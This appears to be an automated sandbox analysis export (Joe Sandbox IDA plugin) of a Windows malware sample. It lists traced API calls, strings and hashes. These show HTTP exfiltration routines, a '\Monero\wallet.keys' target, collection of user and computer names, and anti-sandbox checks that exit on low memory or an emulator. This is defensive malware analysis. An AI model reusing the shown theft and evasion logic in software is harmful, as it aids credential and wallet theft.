LoadLibraryA.KERNEL32(0099D898,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A370
LoadLibraryA.KERNEL32(0099D8C8,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A382
LoadLibraryA.KERNEL32(0099D8B0,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A393
LoadLibraryA.KERNEL32(0099D8E0,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A3A5
LoadLibraryA.KERNEL32(0099D928,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A3B7
LoadLibraryA.KERNEL32(0099DC88,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A3C8
GetProcAddress.KERNEL32(751E0000,00985288), ref: 00E2A3EA
GetProcAddress.KERNEL32(751E0000,0099DC10), ref: 00E2A402
GetProcAddress.KERNEL32(751E0000,00998C18), ref: 00E2A41A
GetProcAddress.KERNEL32(751E0000,0099DAD8), ref: 00E2A433
GetProcAddress.KERNEL32(751E0000,00985108), ref: 00E2A44B
GetProcAddress.KERNEL32(700F0000,0098A568), ref: 00E2A470
GetProcAddress.KERNEL32(700F0000,009852C8), ref: 00E2A489
GetProcAddress.KERNEL32(700F0000,0098A860), ref: 00E2A4A1
GetProcAddress.KERNEL32(700F0000,0099DCD0), ref: 00E2A4B9
GetProcAddress.KERNEL32(700F0000,0099DD90), ref: 00E2A4D2
GetProcAddress.KERNEL32(700F0000,00985168), ref: 00E2A4EA
GetProcAddress.KERNEL32(700F0000,009852E8), ref: 00E2A502
GetProcAddress.KERNEL32(700F0000,0099DC58), ref: 00E2A51B
GetProcAddress.KERNEL32(753A0000,00985128), ref: 00E2A53C
GetProcAddress.KERNEL32(753A0000,00984FE8), ref: 00E2A554
GetProcAddress.KERNEL32(753A0000,0099DB38), ref: 00E2A56D
GetProcAddress.KERNEL32(753A0000,0099DC40), ref: 00E2A585
GetProcAddress.KERNEL32(753A0000,00985308), ref: 00E2A59D
GetProcAddress.KERNEL32(76310000,0098A838), ref: 00E2A5C3
GetProcAddress.KERNEL32(76310000,0098A8D8), ref: 00E2A5DB
GetProcAddress.KERNEL32(76310000,0099DD18), ref: 00E2A5F3
GetProcAddress.KERNEL32(76310000,009851E8), ref: 00E2A60C
GetProcAddress.KERNEL32(76310000,00984F88), ref: 00E2A624
GetProcAddress.KERNEL32(76310000,0098A900), ref: 00E2A63C
GetProcAddress.KERNEL32(76910000,0099DDA8), ref: 00E2A662
GetProcAddress.KERNEL32(76910000,00985268), ref: 00E2A67A
GetProcAddress.KERNEL32(76910000,00998C28), ref: 00E2A692
GetProcAddress.KERNEL32(76910000,0099DCE8), ref: 00E2A6AB
GetProcAddress.KERNEL32(76910000,0099DD60), ref: 00E2A6C3
GetProcAddress.KERNEL32(76910000,009851A8), ref: 00E2A6DB
GetProcAddress.KERNEL32(76910000,00985008), ref: 00E2A6F4
GetProcAddress.KERNEL32(76910000,0099DAC0), ref: 00E2A70C
GetProcAddress.KERNEL32(76910000,0099DAF0), ref: 00E2A724
GetProcAddress.KERNEL32(75B30000,00985148), ref: 00E2A746
GetProcAddress.KERNEL32(75B30000,0099DD48), ref: 00E2A75E
GetProcAddress.KERNEL32(75B30000,0099DB98), ref: 00E2A776
GetProcAddress.KERNEL32(75B30000,0099DB08), ref: 00E2A78F
GetProcAddress.KERNEL32(75B30000,0099DBB0), ref: 00E2A7A7
GetProcAddress.KERNEL32(75670000,00985208), ref: 00E2A7C8
GetProcAddress.KERNEL32(75670000,009850E8), ref: 00E2A7E1
GetProcAddress.KERNEL32(76AC0000,009852A8), ref: 00E2A802
GetProcAddress.KERNEL32(76AC0000,0099DB20), ref: 00E2A81A
GetProcAddress.KERNEL32(6F4E0000,009851C8), ref: 00E2A840
GetProcAddress.KERNEL32(6F4E0000,009850C8), ref: 00E2A858
GetProcAddress.KERNEL32(6F4E0000,00985328), ref: 00E2A870
GetProcAddress.KERNEL32(6F4E0000,0099DD00), ref: 00E2A889
GetProcAddress.KERNEL32(6F4E0000,00985228), ref: 00E2A8A1
GetProcAddress.KERNEL32(6F4E0000,00985068), ref: 00E2A8B9
GetProcAddress.KERNEL32(6F4E0000,00985088), ref: 00E2A8D2
GetProcAddress.KERNEL32(6F4E0000,00985188), ref: 00E2A8EA
GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00E2A901
GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00E2A917
GetProcAddress.KERNEL32(75AE0000,0099DC70), ref: 00E2A939
GetProcAddress.KERNEL32(75AE0000,00998B48), ref: 00E2A951
GetProcAddress.KERNEL32(75AE0000,0099DD30), ref: 00E2A969
GetProcAddress.KERNEL32(75AE0000,0099DCA0), ref: 00E2A982
GetProcAddress.KERNEL32(76300000,00984F48), ref: 00E2A9A3
GetProcAddress.KERNEL32(6FE40000,0099DBE0), ref: 00E2A9C4
GetProcAddress.KERNEL32(6FE40000,00985248), ref: 00E2A9DD
GetProcAddress.KERNEL32(6FE40000,0099DCB8), ref: 00E2A9F5
GetProcAddress.KERNEL32(6FE40000,0099DB50), ref: 00E2AA0D

Strings

HttpQueryInfoA, xrefs: 00E2A90C
InternetSetOptionA, xrefs: 00E2A8F5

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 2ce2ec86cd326e8e0f390af4be992833431f169ec6629df15bb025694888a32c
Instruction ID: d237ed173dd5dfb64cc892abd2b36ee81bb740d8b28ff38998d6b5eba20d352a
Opcode Fuzzy Hash: 2ce2ec86cd326e8e0f390af4be992833431f169ec6629df15bb025694888a32c
Instruction Fuzzy Hash: A46220B55002009FC374DFAAF88895677FAE79DF01710859AFA89CB258D73FA541CBA0

Function 00E148D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E14965
StrCmpCA.SHLWAPI(?,0099FB60), ref: 00E1498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E14B0A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E30DDE,00000000,?,?,00000000,?,",00000000,?,0099F980), ref: 00E14E38
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E14E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E14E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E14E99
InternetCloseHandle.WININET(00000000), ref: 00E14EFD
InternetCloseHandle.WININET(00000000), ref: 00E14F15
HttpOpenRequestA.WININET(00000000,0099FA30,?,0099F2D8,00000000,00000000,00400100,00000000), ref: 00E14B65

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

InternetCloseHandle.WININET(00000000), ref: 00E14F1F

Strings

", xrefs: 00E14D83
", xrefs: 00E14C42
------, xrefs: 00E14B78
------, xrefs: 00E14A0D
------, xrefs: 00E14CB9

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: d02bdf0c6dc2fbc132eaf7710aab37a6df0e4dee8f49ce58ab4a45a736e64356
Instruction ID: 9847cd5dfe82dcf3c131807eba3c2c2e3357eddfe7184b48df0f8e8d82d9cfa8
Opcode Fuzzy Hash: d02bdf0c6dc2fbc132eaf7710aab37a6df0e4dee8f49ce58ab4a45a736e64356
Instruction Fuzzy Hash: 5612FC72910228ABCB15EB90ED62FEEB7B9BF14300F4855A9F10676191DF306F48CB61

Function 00E25760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E2AB30: lstrlen.KERNEL32(UO,?,?,00E14F55,00E30DDF), ref: 00E2AB3B
Part of subcall function 00E2AB30: lstrcpy.KERNEL32(00E30DDF,00000000), ref: 00E2AB95

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25894
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E258F1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25AA7

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

Part of subcall function 00E25440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25478

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E25510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25568
Part of subcall function 00E25510: lstrlen.KERNEL32(00000000), ref: 00E2557F
Part of subcall function 00E25510: StrStrA.SHLWAPI(00000000,00000000), ref: 00E255B4
Part of subcall function 00E25510: lstrlen.KERNEL32(00000000), ref: 00E255D3
Part of subcall function 00E25510: lstrlen.KERNEL32(00000000), ref: 00E255FE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E259DB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25B90
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25C5C
Sleep.KERNEL32(0000EA60), ref: 00E25C6B

Strings

ERROR, xrefs: 00E259CD
ERROR, xrefs: 00E25B82
ERROR, xrefs: 00E25A99
ERROR, xrefs: 00E25C4E
ERROR, xrefs: 00E25886
ERROR, xrefs: 00E258E3

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 9316ed9ce317fe62ccbf5908f3f8b4effa80f6739df58a7be3cf784afb2138f6
Instruction ID: 73d632e75e47e086a0a0306a02d984dac94843be862ffcdebdbaf22d85fe780e
Opcode Fuzzy Hash: 9316ed9ce317fe62ccbf5908f3f8b4effa80f6739df58a7be3cf784afb2138f6
Instruction Fuzzy Hash: 2EE160729101189BCB18FBA0F967AFD73BDAF54300F44A568F50776085EF356A48CBA2

Function 00E219F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00E21A15
ExitProcess.KERNEL32 ref: 00E21A21

Strings

block, xrefs: 00E21A07

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 1172093d243a5b78272c8855b37850d513c8c3e66fab8534c6b399efc823a647
Instruction ID: a14620745111dfa5cbf5f4fcd0cc8f6687367d56d7b3034e57441e08ccf43b3c
Opcode Fuzzy Hash: 1172093d243a5b78272c8855b37850d513c8c3e66fab8534c6b399efc823a647
Instruction Fuzzy Hash: F1515B78B08219EFCB14DFA4E958AEE77B9EF54704F60509CE402BB240E775EA41CB61

Function 00E26C90 Relevance: 9.1, APIs: 6, Instructions: 89
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,00991728), ref: 00E29BF1
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,009914E8), ref: 00E29C0A
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,00991698), ref: 00E29C22
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,009915D8), ref: 00E29C3A
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,00991530), ref: 00E29C53
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,00998C48), ref: 00E29C6B
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,00985508), ref: 00E29C83
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,00985608), ref: 00E29C9C
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,00991608), ref: 00E29CB4
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,009916B0), ref: 00E29CCC
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,00991788), ref: 00E29CE5
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,00991500), ref: 00E29CFD
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,009856C8), ref: 00E29D15
Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(76210000,009916C8), ref: 00E29D2E

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E111D0: ExitProcess.KERNEL32 ref: 00E11211

Part of subcall function 00E11160: GetSystemInfo.KERNEL32(?), ref: 00E1116A
Part of subcall function 00E11160: ExitProcess.KERNEL32 ref: 00E1117E

Part of subcall function 00E11110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E1112B
Part of subcall function 00E11110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E11132
Part of subcall function 00E11110: ExitProcess.KERNEL32 ref: 00E11143

Part of subcall function 00E11220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E1123E
Part of subcall function 00E11220: __aulldiv.LIBCMT ref: 00E11258
Part of subcall function 00E11220: __aulldiv.LIBCMT ref: 00E11266
Part of subcall function 00E11220: ExitProcess.KERNEL32 ref: 00E11294

Part of subcall function 00E26A10: GetUserDefaultLangID.KERNEL32 ref: 00E26A14

Part of subcall function 00E11190: ExitProcess.KERNEL32 ref: 00E111C6

Part of subcall function 00E279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27A10
Part of subcall function 00E279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E27A17
Part of subcall function 00E279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E27A2F

Part of subcall function 00E27A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27AA0
Part of subcall function 00E27A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E27AA7
Part of subcall function 00E27A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E27ABF

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00998C68,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E26D88
CloseHandle.KERNEL32(00000000), ref: 00E26D99
Sleep.KERNEL32(00001770), ref: 00E26DA4
CloseHandle.KERNEL32(?,00000000,?,00998C68,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26DBA
ExitProcess.KERNEL32 ref: 00E26DC2

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: ffedaffd8130eef70bb00fbde1646e94bfb2194c9388fd0992db15bc52d924a3
Instruction ID: eb7475a131fb2e341cb550e87fd07282f111d1b92120dee14747359ea979cb73
Opcode Fuzzy Hash: ffedaffd8130eef70bb00fbde1646e94bfb2194c9388fd0992db15bc52d924a3
Instruction Fuzzy Hash: D5310C71A00228ABCB04F7F0EC57AEEB7F9AF04740F586968F51276182DF746945C762

Function 00E11220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E1123E
__aulldiv.LIBCMT ref: 00E11258
__aulldiv.LIBCMT ref: 00E11266
ExitProcess.KERNEL32 ref: 00E11294

Strings

@, xrefs: 00E11233

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: e1a4be6c9ea0a3f90dc8329edd0d79a73435f283606c201a985c9f755c608941
Instruction ID: 324539030445557ce363d9503e8e885b4becf935190b38c5ffb38be1e708a992
Opcode Fuzzy Hash: e1a4be6c9ea0a3f90dc8329edd0d79a73435f283606c201a985c9f755c608941
Instruction Fuzzy Hash: 8D016DB0D44318BAEF10DFE4DC4ABEEBBB8EB14705F209488E705BA1C0C6745581DB99

Function 00E26D93 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00998C68,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E26D88
CloseHandle.KERNEL32(00000000), ref: 00E26D99
Sleep.KERNEL32(00001770), ref: 00E26DA4
CloseHandle.KERNEL32(?,00000000,?,00998C68,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26DBA
ExitProcess.KERNEL32 ref: 00E26DC2

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
